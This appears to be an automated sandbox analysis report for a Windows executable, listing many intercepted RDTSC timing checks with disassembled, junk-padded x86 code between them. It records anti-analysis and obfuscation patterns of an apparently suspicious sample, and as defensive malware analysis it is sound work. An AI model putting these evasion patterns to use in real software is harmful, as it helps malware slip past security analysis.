              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD02D6 second address: 4CC0039 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0CB0C50341h 0x00000008 and ecx, 7BF15596h 0x0000000e jmp 00007F0CB0C50341h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov esi, 65E3B207h 0x0000001b popad 0x0000001c retn 0004h 0x0000001f nop 0x00000020 cmp eax, 00000000h 0x00000023 setne al 0x00000026 xor ebx, ebx 0x00000028 test al, 01h 0x0000002a jne 00007F0CB0C50337h 0x0000002c xor eax, eax 0x0000002e sub esp, 08h 0x00000031 mov dword ptr [esp], 00000000h 0x00000038 mov dword ptr [esp+04h], 00000000h 0x00000040 call 00007F0CB5809773h 0x00000045 mov edi, edi 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a pushfd 0x0000004b jmp 00007F0CB0C5033Dh 0x00000050 add ch, FFFFFFF6h 0x00000053 jmp 00007F0CB0C50341h 0x00000058 popfd 0x00000059 jmp 00007F0CB0C50340h 0x0000005e popad 0x0000005f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC0039 second address: 4CC004B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0CB0E1B25Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC004B second address: 4CC00A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C5033Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F0CB0C50346h 0x00000011 push eax 0x00000012 pushad 0x00000013 mov bh, 78h 0x00000015 call 00007F0CB0C5033Ah 0x0000001a mov si, F831h 0x0000001e pop esi 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F0CB0C50348h 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC01D1 second address: 4CC01E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B25Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC01E3 second address: 4CC01F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0CB0C5033Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC01F5 second address: 4CC021E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B25Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0CB0E1B265h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC021E second address: 4CC0252 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C50341h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 18h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0CB0C50348h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC0252 second address: 4CC0258 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC0258 second address: 4CC0269 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0CB0C5033Dh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC0269 second address: 4CC02DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a mov cl, bh 0x0000000c popad 0x0000000d mov dword ptr [esp], ebx 0x00000010 jmp 00007F0CB0E1B25Eh 0x00000015 xchg eax, esi 0x00000016 pushad 0x00000017 call 00007F0CB0E1B25Eh 0x0000001c movzx ecx, bx 0x0000001f pop edi 0x00000020 movzx esi, di 0x00000023 popad 0x00000024 push eax 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F0CB0E1B25Bh 0x0000002c jmp 00007F0CB0E1B263h 0x00000031 popfd 0x00000032 popad 0x00000033 xchg eax, esi 0x00000034 pushad 0x00000035 mov di, si 0x00000038 movzx eax, dx 0x0000003b popad 0x0000003c push ecx 0x0000003d pushad 0x0000003e mov eax, edx 0x00000040 popad 0x00000041 mov dword ptr [esp], edi 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F0CB0E1B25Ah 0x0000004b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC02DF second address: 4CC0322 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C5033Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [769B4538h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F0CB0C5033Bh 0x00000017 xor al, FFFFFFFEh 0x0000001a jmp 00007F0CB0C50349h 0x0000001f popfd 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC0322 second address: 4CC038E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B267h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [ebp-08h], eax 0x0000000c jmp 00007F0CB0E1B266h 0x00000011 xor eax, ebp 0x00000013 pushad 0x00000014 mov edi, 4A067622h 0x00000019 popad 0x0000001a push esp 0x0000001b jmp 00007F0CB0E1B262h 0x00000020 mov dword ptr [esp], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F0CB0E1B267h 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC038E second address: 4CC0430 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C50349h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c pushad 0x0000000d push eax 0x0000000e mov edi, 0622ADDEh 0x00000013 pop edx 0x00000014 call 00007F0CB0C50344h 0x00000019 push esi 0x0000001a pop edx 0x0000001b pop esi 0x0000001c popad 0x0000001d mov dword ptr fs:[00000000h], eax 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F0CB0C50343h 0x0000002a or esi, 566C27EEh 0x00000030 jmp 00007F0CB0C50349h 0x00000035 popfd 0x00000036 push eax 0x00000037 push edx 0x00000038 pushfd 0x00000039 jmp 00007F0CB0C5033Eh 0x0000003e jmp 00007F0CB0C50345h 0x00000043 popfd 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC0430 second address: 4CC0482 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0CB0E1B260h 0x00000008 add al, FFFFFFC8h 0x0000000b jmp 00007F0CB0E1B25Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 mov dword ptr [ebp-18h], esp 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F0CB0E1B264h 0x0000001e adc ah, 00000028h 0x00000021 jmp 00007F0CB0E1B25Bh 0x00000026 popfd 0x00000027 push eax 0x00000028 push edx 0x00000029 movzx esi, dx 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC0482 second address: 4CC04AB instructions: 0x00000000 rdtsc 0x00000002 mov ax, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov eax, dword ptr fs:[00000018h] 0x0000000e pushad 0x0000000f pushad 0x00000010 mov edx, 0DC8B49Ch 0x00000015 mov cx, bx 0x00000018 popad 0x00000019 mov bx, FB34h 0x0000001d popad 0x0000001e mov ecx, dword ptr [eax+00000FDCh] 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC04AB second address: 4CC04FB instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0CB0E1B265h 0x00000008 add ecx, 4462E5A6h 0x0000000e jmp 00007F0CB0E1B261h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov bx, ax 0x00000019 popad 0x0000001a test ecx, ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F0CB0E1B264h 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC04FB second address: 4CC050A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C5033Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC050A second address: 4CC056A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B269h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F0CB0E1B276h 0x0000000f pushad 0x00000010 call 00007F0CB0E1B25Ch 0x00000015 mov ax, ABA1h 0x00000019 pop ecx 0x0000001a movsx edi, ax 0x0000001d popad 0x0000001e add eax, ecx 0x00000020 pushad 0x00000021 mov cx, 739Bh 0x00000025 mov ah, AEh 0x00000027 popad 0x00000028 mov ecx, dword ptr [ebp+08h] 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e jmp 00007F0CB0E1B264h 0x00000033 mov edi, esi 0x00000035 popad 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC056A second address: 4CC0578 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0CB0C5033Ah 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB01B5 second address: 4CB026B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0CB0E1B25Fh 0x00000009 adc esi, 253A786Eh 0x0000000f jmp 00007F0CB0E1B269h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F0CB0E1B260h 0x0000001b sbb esi, 047E83E8h 0x00000021 jmp 00007F0CB0E1B25Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a xchg eax, ebp 0x0000002b jmp 00007F0CB0E1B266h 0x00000030 push eax 0x00000031 jmp 00007F0CB0E1B25Bh 0x00000036 xchg eax, ebp 0x00000037 jmp 00007F0CB0E1B266h 0x0000003c mov ebp, esp 0x0000003e jmp 00007F0CB0E1B260h 0x00000043 sub esp, 2Ch 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F0CB0E1B25Ah 0x0000004f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB026B second address: 4CB026F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB026F second address: 4CB0275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB03DF second address: 4CB03E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB03E5 second address: 4CB03E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB03E9 second address: 4CB03ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0527 second address: 4CB0617 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B269h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b jmp 00007F0CB0E1B25Eh 0x00000010 jg 00007F0D22AC918Eh 0x00000016 pushad 0x00000017 jmp 00007F0CB0E1B25Eh 0x0000001c mov di, cx 0x0000001f popad 0x00000020 js 00007F0CB0E1B2CCh 0x00000026 jmp 00007F0CB0E1B25Ch 0x0000002b cmp dword ptr [ebp-14h], edi 0x0000002e jmp 00007F0CB0E1B260h 0x00000033 jne 00007F0D22AC915Fh 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007F0CB0E1B25Eh 0x00000040 add si, FCE8h 0x00000045 jmp 00007F0CB0E1B25Bh 0x0000004a popfd 0x0000004b pushfd 0x0000004c jmp 00007F0CB0E1B268h 0x00000051 jmp 00007F0CB0E1B265h 0x00000056 popfd 0x00000057 popad 0x00000058 mov ebx, dword ptr [ebp+08h] 0x0000005b jmp 00007F0CB0E1B25Eh 0x00000060 lea eax, dword ptr [ebp-2Ch] 0x00000063 jmp 00007F0CB0E1B260h 0x00000068 xchg eax, esi 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c mov si, dx 0x0000006f pushad 0x00000070 popad 0x00000071 popad 0x00000072 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0617 second address: 4CB0639 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0CB0C50342h 0x00000008 pop ecx 0x00000009 mov esi, edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0639 second address: 4CB063D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB063D second address: 4CB0656 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C50345h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0656 second address: 4CB065B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB065B second address: 4CB0693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b mov esi, edi 0x0000000d pushfd 0x0000000e jmp 00007F0CB0C50341h 0x00000013 jmp 00007F0CB0C5033Bh 0x00000018 popfd 0x00000019 popad 0x0000001a nop 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov cl, bl 0x00000020 mov eax, 6CA302C3h 0x00000025 popad 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0693 second address: 4CB06B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B269h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB06B6 second address: 4CB06BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB06BA second address: 4CB0747 instructions: 0x00000000 rdtsc 0x00000002 call 00007F0CB0E1B263h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a call 00007F0CB0E1B269h 0x0000000f pushfd 0x00000010 jmp 00007F0CB0E1B260h 0x00000015 sbb cx, 6248h 0x0000001a jmp 00007F0CB0E1B25Bh 0x0000001f popfd 0x00000020 pop eax 0x00000021 popad 0x00000022 nop 0x00000023 jmp 00007F0CB0E1B25Fh 0x00000028 xchg eax, ebx 0x00000029 jmp 00007F0CB0E1B266h 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F0CB0E1B25Eh 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0747 second address: 4CB074D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB074D second address: 4CB0751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB07B0 second address: 4CB07C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0CB0C5033Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB07C0 second address: 4CB07C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0EB0 second address: 4CA0ECC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C50348h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0ECC second address: 4CA0EDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0CB0E1B25Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0EDE second address: 4CA0F01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0CB0C50346h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0F01 second address: 4CA0F10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B25Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0F10 second address: 4CA0F40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 594D07CAh 0x00000008 jmp 00007F0CB0C5033Bh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0CB0C50345h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0F40 second address: 4CA0F6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B261h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-04h], 55534552h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 call 00007F0CB0E1B25Ah 0x00000018 pop eax 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0CF8 second address: 4CB0CFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0CFC second address: 4CB0D02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0D02 second address: 4CB0D3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F0CB0C50346h 0x0000000b xor ax, E218h 0x00000010 jmp 00007F0CB0C5033Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 cmp dword ptr [769B459Ch], 05h 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0D3F second address: 4CB0D45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0DC9 second address: 4CB0DD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0CB0C5033Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0DD9 second address: 4CB0E12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B25Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 6AA50DB1h 0x00000010 pushad 0x00000011 mov ebx, 2FCCD5F8h 0x00000016 push edx 0x00000017 call 00007F0CB0E1B25Ch 0x0000001c pop esi 0x0000001d pop ebx 0x0000001e popad 0x0000001f xor dword ptr [esp], 1C3F9199h 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0E12 second address: 4CB0E25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C5033Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0E25 second address: 4CB0E5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 3Bh 0x00000005 pushfd 0x00000006 jmp 00007F0CB0E1B260h 0x0000000b jmp 00007F0CB0E1B265h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 call 00007F0D22ABFF74h 0x00000019 push 76952B70h 0x0000001e push dword ptr fs:[00000000h] 0x00000025 mov eax, dword ptr [esp+10h] 0x00000029 mov dword ptr [esp+10h], ebp 0x0000002d lea ebp, dword ptr [esp+10h] 0x00000031 sub esp, eax 0x00000033 push ebx 0x00000034 push esi 0x00000035 push edi 0x00000036 mov eax, dword ptr [769B4538h] 0x0000003b xor dword ptr [ebp-04h], eax 0x0000003e xor eax, ebp 0x00000040 push eax 0x00000041 mov dword ptr [ebp-18h], esp 0x00000044 push dword ptr [ebp-08h] 0x00000047 mov eax, dword ptr [ebp-04h] 0x0000004a mov dword ptr [ebp-04h], FFFFFFFEh 0x00000051 mov dword ptr [ebp-08h], eax 0x00000054 lea eax, dword ptr [ebp-10h] 0x00000057 mov dword ptr fs:[00000000h], eax 0x0000005d ret 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 popad 0x00000064 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0E5F second address: 4CB0E72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C5033Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0E72 second address: 4CB0EA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 movsx edi, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub esi, esi 0x0000000d jmp 00007F0CB0E1B263h 0x00000012 mov dword ptr [ebp-1Ch], esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F0CB0E1B260h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0EA9 second address: 4CB0EB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C5033Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0EB8 second address: 4CB0ED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0CB0E1B264h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0ED0 second address: 4CB0ED4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0F42 second address: 4CB0F48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0379 second address: 4CD037D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD037D second address: 4CD0381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0381 second address: 4CD0387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0387 second address: 4CD03C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B265h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c call 00007F0CB0E1B25Ch 0x00000011 movzx esi, di 0x00000014 pop edx 0x00000015 popad 0x00000016 xchg eax, esi 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F0CB0E1B260h 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD03C9 second address: 4CD03CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD03CD second address: 4CD03D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD03D3 second address: 4CD03E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0CB0C5033Dh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD03E4 second address: 4CD040A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B261h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0CB0E1B25Ch 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD040A second address: 4CD042C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C5033Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F0CB0C5033Eh 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD042C second address: 4CD046F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B25Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+0Ch] 0x0000000c jmp 00007F0CB0E1B266h 0x00000011 test esi, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0CB0E1B267h 0x0000001a rdtsc
